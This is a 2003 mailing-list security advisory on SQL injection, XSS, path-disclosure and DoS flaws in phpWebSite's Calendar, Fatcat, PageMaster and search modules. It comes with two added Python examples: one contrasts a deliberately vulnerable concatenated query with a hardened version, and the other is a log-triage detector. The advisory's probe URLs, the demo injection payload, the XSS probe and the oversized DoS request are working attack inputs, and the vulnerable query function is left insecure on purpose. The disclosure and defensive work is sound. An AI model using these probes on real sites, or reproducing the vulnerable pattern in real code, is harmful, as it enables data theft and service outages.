Message-ID: <200308112021.h7BKLTs3018948@novappc.com>
From: novappc at novappc.com (Lorenzo Hernandez Garcia-Hierro)
Subject: phpWebSite SQL Injection & DoS & XSS Vulnerabilities
Hi Jack,
I was contacted by the phpWebSite team to release the fix.
The fix is only to prevent the XSS attacks; they are now working on
fixes for the SQL injections.
Best regards,
> There is a fix for this available at phpWebSite's page (posted a short time
> ago):
> http://phpwebsite.appstate.edu/
>
> -Jack Whitsitt
>
>
> ----- Original Message -----
> From: "Lorenzo Hernandez Garcia-Hierro" <novappc@...appc.com>
> To: <full-disclosure@...ts.netsys.com>
> Sent: Sunday, August 10, 2003 6:15 PM
> Subject: [Full-Disclosure] phpWebSite SQL Injection & DoS & XSS
> Vulnerabilities
>
>
> >
> > phpWebSite SQL Injection & DoS & XSS Vulnerabilities
> > ------
> > PRODUCT: phpWebSite
> > VENDOR: Appalachian State University
> > VULNERABLE VERSIONS:
> >
> > - 0.9.x
> > - 0.8.x
> > - 0.7.x
> > - And older versions.
> >
> > NOT VULNERABLE VERSIONS
> >
> > - ?
> > ---------------------
> >
> > Description:
> >
> > phpWebSite provides a complete web site content management system.
> > Web-based administration allows for easy maintenance of interactive,
> > community-driven web sites.
> >
> > ---------------------------------------------
> > |SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
> > ---------------------------------------------
> >
> > I encountered SQL Injection vulnerabilities in some of the phpWebSite
> > modules, XSS (Cross Site Scripting), Path Disclosures and a Denial
> > of Service attack.
> >
> > -------------
> > | SQL |
> > | INJECTION |
> > -------------
> >
> > I encountered SQL Injection vulnerabilities in the Calendar module,
> > active in default configurations, that allow you to execute SQL
> > queries on the target server with the privileges of the application
> > user.
> >
> > When you send a specially crafted command URL to the Calendar script
> > you get a SQL error flag like this:
> > __________________________________________________________________
> > DB Error: syntax error
> > select * from mod_calendar_events where ((startDate >= 2003\0[CRAFTED
> > VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
> > (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED
> > VALUE]0110)) and active=1 [nativecode=1064
> > ** You have an error in your SQL syntax near
> > '\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
> > (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1]
> > ___________________________________________________________________
> >
> > This is an example error flag:
> > ___________________________________________________________________
> > DB Error: syntax error
> > select * from mod_calendar_events where ((startDate >= 2003\0-10110 and
> > startDate <= 2003\0-10110) or
> > (endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1
> > [nativecode=1064
> > ** You have an error in your SQL syntax near
> > '\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110
> > and endDate ' at line 1]
> > ___________________________________________________________________
> >
> > To get this you must use this simple URL:
> >
> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
> >
> > And you get the SQL error flag. The error occurs when the query
> > includes the crafted value 2003[%00 = null]-1.
> > You can design a successful query to get configuration values or
> > authentication data.
> > I designed a URL that makes a successful query (no hostile query):
> >
> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%29%20and%20active%3d1
> >
> > It is (without URL encoding):
> >
> > 2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <= 20071205)) and active=1
> >
> > A little knowledge of SQL (in this case, MySQL) is needed to make a
> > successful attack.
> >
> > Other scripts of the Calendar module are affected by this hole; when
> > you send a crafted request, like a + symbol as a critical URL variable
> > value, you get the "pure" SQL server error flag and you can imagine (I
> > like this word) a SQL query to view private information of the
> > application by looking at the error pages, like a trial-and-error
> > method.
> >
> > Other URLs to probe are:
> >
> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&month=0&year=<
> >
> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&month=1%00&year=)SQL_INJECTION_FAKU
> >
> > ------------------
> > | XSS |
> > | vulnerabilities|
> > ------------------
> >
> > I encountered XSS security holes in some scripts of phpWebSite:
> >
> >
> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]
> >
> > http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]
> >
> > http://[HOST]/[PATH]/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]&MMN_position=[X:X]
> >
> > http://[HOST]/[PATH]/index.php?module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
> >
> >
> > Note that the Calendar, PageMaster and Fatcat modules are affected
> > COMPLETELY, and all the script variables that are passed by URL are
> > affected by this too.
> >
> > When you access a hostile link with an XSS attack in those scripts your
> > browser will execute the script commands.
> > This can be used to steal cookies, authentication tokens and other
> > private information.
> > If your browser is vulnerable to other holes (like MSIE ;-) you can
> > have more problems...
> >
> > XSS AT SQL ERRORS:
> >
> > If you send a crafted URL command with XSS attack code to some of the
> > scripts that are vulnerable to SQL injection, the XSS attack code will
> > be executed in the error page.
> >
> >
> > -----------------
> > | PATH |
> > | DISCLOSURES |
> > -----------------
> >
> > I tested this on Win2K (Windows 2000 Professional) with SP3 and
> > versions:
> >
> > - Sambar Server 5.2 beta
> > - PHP 4.2.3 running as ISAPI module
> > - MySQL NT [normal service] 3.23.56
> > - Include_Path to the pear folder of phpwebsite
> >
> > Sending this:
> >
> > http://127.0.0.1/index.php?module=calendar&calendar[view]=month&month=11&year=9
> > # You can try other things and get the same #
> >
> > you get this:
> >
> > Warning: localtime(): invalid local time in
> > C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
> >
> > Warning: localtime(): invalid local time in
> > C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
> >
> > <- more than fifty repetitions of this warning ->
> >
> > It is a strange error; I think that it only occurs on MS Windows
> > installations.
> > Possibly it occurs when the PEAR library TimeZone.php script tries to
> > convert the local date into Unix timestamp format.
> >
> > ------------------
> > | DENIAL OF |
> > | SERVICE |
> > ------------------
> >
> > There is a DoS/Buffer Overflow attack in a script inside the Calendar
> > module that allows you to crash the host running the MySQL server and
> > the phpWebSite scripts (must be the same computer).
> >
> > This is a basic proof of concept for this vulnerability:
> >
> > http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=[VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes )
> >
> > An attack like this causes a global system crash, including the server
> > service and the mysql service.
> >
> > -----------------
> > | SoLuTiOnS |
> > -----------------
> >
> > 1.- Be sure that the user of the phpWebSite database has only SELECT,
> > INSERT and UPDATE privileges, and only on the phpWebSite database.
> >
> > 2.- Use the PHP function eregi_replace to prevent XSS attacks.
> >
> > 3.- Turn php_error_flags to Off.
> >
> > 4.- In addition, use an external module such as mod_security if you
> > are using Apache.
> >
> > 5.- If you are paranoid, don't use PHP, MySQL, Windows, Linux,
> > computers, TCP/IP, NetBIOS, games, ASP, Apache...... nothing!
> > WARNING ;-) : (paranoid solution...)
> >
> > -----------
> > | CONTACT |
> > -----------
> >
> > Lorenzo Hernandez Garcia-Hierro
> > --- Computer Security Analyzer ---
> > --Nova Projects Professional Coding--
> > PGP: Keyfingerprint
> > B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
> > ID: 0x9C38E1D7
> > **********************************
> > www.novappc.com
> > security.novappc.com
> > www.lorenzohgh.com
> > ______________________
> >
> > NSRG-20-7
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
>
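Added example (not phpWebSite code and not part of the advisory above): the quoted DB error shows the Calendar module's date comparisons being built from the raw year/month/day request strings, which is why a value like 2003%00-1 lands in the SQL as a syntax error. The block below reconstructs that concatenation pattern and puts the hardened form beside it: allow-list validation of the three parameters, bound parameters for the query, and HTML escaping for any parameter echoed back (the reflected-XSS half of the advisory). Everything else is an assumption for the demo: sqlite3 stands in for MySQL, the table schema and sample rows are constructed, and the function names are hypothetical.

```python
"""
Added example, not phpWebSite's own code.  It reconstructs, from the DB error
text quoted in the advisory, how the Calendar module's year/month/day URL
parameters were pasted into SQL, and puts a hardened version beside it.
The sqlite3 backend, the table schema and the sample rows are constructed
for this demo; only the column names come from the advisory's error message.
"""
import html
import re
import sqlite3
from urllib.parse import unquote

# Constructed sample rows: (id, startDate, endDate, title, active).  Dates are
# YYYYMMDD integers, matching the comparisons in the quoted error message.
EVENTS = [
    (1, 20031110, 20031110, "Public lecture", 1),
    (2, 20031110, 20031111, "Board meeting (inactive, should stay hidden)", 0),
    (3, 20031201, 20031201, "December social", 1),
]


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table mod_calendar_events ("
        "id integer, startDate integer, endDate integer, title text, active integer)"
    )
    conn.executemany("insert into mod_calendar_events values (?,?,?,?,?)", EVENTS)
    return conn


def vulnerable_day_query(conn, year, month, day):
    """Reconstructed vulnerable pattern: raw request strings concatenated into
    the statement.  A value such as '2003\\x00-1' lands in the SQL verbatim,
    which is the 'syntax error near ...' the advisory shows."""
    date = f"{year}{month}{day}"
    sql = (
        "select * from mod_calendar_events where "
        f"((startDate >= {date} and startDate <= {date}) or "
        f"(endDate >= {date} and endDate <= {date})) and active=1"
    )
    return conn.execute(sql).fetchall()


def _int_param(value, name, lo, hi):
    """Allow-list validation: ASCII digits only, then a range check.  This
    rejects every probe value in the advisory (NUL bytes, '+', '<', ')', SQL
    fragments, '\">...') before anything reaches the database."""
    if not isinstance(value, str) or not re.fullmatch(r"[0-9]{1,4}", value):
        raise ValueError(f"{name}: rejected {value!r}")
    n = int(value)
    if not lo <= n <= hi:
        raise ValueError(f"{name}: {n} out of range")
    return n


def safe_day_query(conn, year, month, day):
    """Hardened version: validated integers bound as parameters, so the
    statement text never changes with user input."""
    y = _int_param(year, "year", 1970, 2100)
    m = _int_param(month, "month", 1, 12)
    d = _int_param(day, "day", 1, 31)
    date = y * 10000 + m * 100 + d
    sql = (
        "select * from mod_calendar_events where "
        "((startDate >= ? and startDate <= ?) or "
        "(endDate >= ? and endDate <= ?)) and active=1"
    )
    return conn.execute(sql, (date, date, date, date)).fetchall()


def safe_day_heading(year, month, day):
    """The reflected-XSS side: if a parameter is echoed into the page (a
    hypothetical day heading here), HTML-escape it even though validation
    already ran, so a ' \">' payload renders as text rather than markup."""
    return "<h2>Events for %s-%s-%s</h2>" % tuple(
        html.escape(str(v), quote=True) for v in (year, month, day)
    )


def demo():
    conn = setup_db()
    # Constructed payload in the advisory's shape (a crafted value pasted into
    # the date).  The first '))' closes the WHERE group and '--' comments out
    # the rest, including 'active=1', so the inactive event leaks.
    payload = "10 or 1=1)) --"
    leaked = vulnerable_day_query(conn, "2003", "11", payload)
    try:  # the same request against the hardened code is rejected outright
        safe_day_query(conn, "2003", "11", payload)
        rejected = False
    except ValueError:
        rejected = True
    try:  # the advisory's own probe, year=2003%00-1, URL-decoded
        safe_day_query(conn, unquote("2003%00-1"), "", "10")
        nul_rejected = False
    except ValueError:
        nul_rejected = True
    legit = safe_day_query(conn, "2003", "11", "10")
    return {
        "leaked_ids": sorted(r[0] for r in leaked),
        "payload_rejected": rejected,
        "nul_byte_rejected": nul_rejected,
        "legit_ids": [r[0] for r in legit],
        "heading": safe_day_heading("2003", "2", '1 \x00">'),
    }


if __name__ == "__main__":
    print(demo())
```

Running it shows the inactive row (id 2) coming back through the concatenated query while the hardened path refuses both the injection payload and the NUL-byte probe and returns only the active event for a valid date. The allow-list check is the part that matters for this advisory: every proof-of-concept value in it contains a byte that is not an ASCII digit.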
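Added example for the operations side, not from the advisory or the phpWebSite project: a small log-triage filter that flags requests shaped like the proofs of concept above (a NUL byte in a parameter, non-numeric year/month/day values, `">` or script markup in a parameter, and a single parameter over 4000 bytes as in the DoS request). The access-log lines are constructed for this demo in Apache combined format; the /phpws/ path, client addresses, timestamps and the alert(1) payload are made up, and the tag names are hypothetical.

```python
"""
Added example, not from the advisory or the phpWebSite project: a log-triage
filter that flags requests shaped like the advisory's proofs of concept.  The
access-log lines are constructed for this demo in Apache combined format; the
/phpws/ path, client addresses and timestamps are made up.
"""
import re
from urllib.parse import parse_qsl

# Constructed sample lines.  Apache records the request target as received,
# so %00 and the SQL/markup payloads are still URL-encoded here.
LOG_LINES = [
    # Ordinary day view: must not be flagged.
    '10.0.0.5 - - [10/Aug/2003:18:15:01 +0200] "GET /phpws/index.php?'
    'module=calendar&calendar[view]=day&year=2003&month=8&day=10 HTTP/1.1" 200 5123',
    # The advisory's NUL-byte probe against year=.
    '10.0.0.9 - - [10/Aug/2003:18:15:07 +0200] "GET /phpws/index.php?'
    'module=calendar&calendar[view]=day&year=2003%00-1&month= HTTP/1.1" 200 2210',
    # First clause of the advisory's "successful query" URL.
    '10.0.0.9 - - [10/Aug/2003:18:15:12 +0200] "GET /phpws/index.php?'
    'module=calendar&calendar[view]=month&month=11&year=2003%20and%20startDate'
    '%20%3c%3d%2020071205%29 HTTP/1.1" 200 8011',
    # Fatcat XSS probe with a constructed script payload.
    '10.0.0.9 - - [10/Aug/2003:18:16:02 +0200] "GET /phpws/index.php?'
    'module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+%22%3E%3Cscript'
    '%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3300',
    # Oversized year= in the shape of the advisory's DoS request (>4000 bytes).
    '10.0.0.9 - - [10/Aug/2003:18:17:45 +0200] "GET /phpws/index.php?'
    'module=calendar&calendar[view]=month&month=11&year='
    + "+".join(str(n) for n in range(91, 1400)) + ' HTTP/1.1" 500 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')
DATE_PART = re.compile(r"[0-9]{1,4}")
DATE_PARAMS = {"year", "month", "day"}
OVERSIZE = 4000  # the advisory's DoS request exceeds this in one parameter


def classify(line):
    """Return a sorted list of (parameter, tag) findings for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    path, _, query = m.group(1).partition("?")
    if not path.endswith("/index.php"):
        return []
    findings = set()
    # parse_qsl decodes %00 to a real NUL and '+' to a space, as PHP would.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if "\x00" in value:
            findings.add((key, "nul-byte"))
        if key in DATE_PARAMS and value and not DATE_PART.fullmatch(value):
            findings.add((key, "non-numeric-date"))
        low = value.lower()
        if '">' in value or "<script" in low or "javascript:" in low:
            findings.add((key, "xss-probe"))
        if len(value) > OVERSIZE:
            findings.add((key, "oversize-param"))
    return sorted(findings)


def triage(lines):
    """Map each flagged line's index to its findings; clean lines are omitted."""
    hits = ((i, classify(line)) for i, line in enumerate(lines))
    return {i: f for i, f in hits if f}


if __name__ == "__main__":
    for i, findings in triage(LOG_LINES).items():
        print(i, findings)
```

The filter deliberately keys on what the advisory's requests have in common rather than on exact URLs: a calendar date part that is not a short run of digits is already enough to catch the NUL-byte, `<`, `)` and SQL-fragment probes, and the length check catches the DoS shape whatever the separator used.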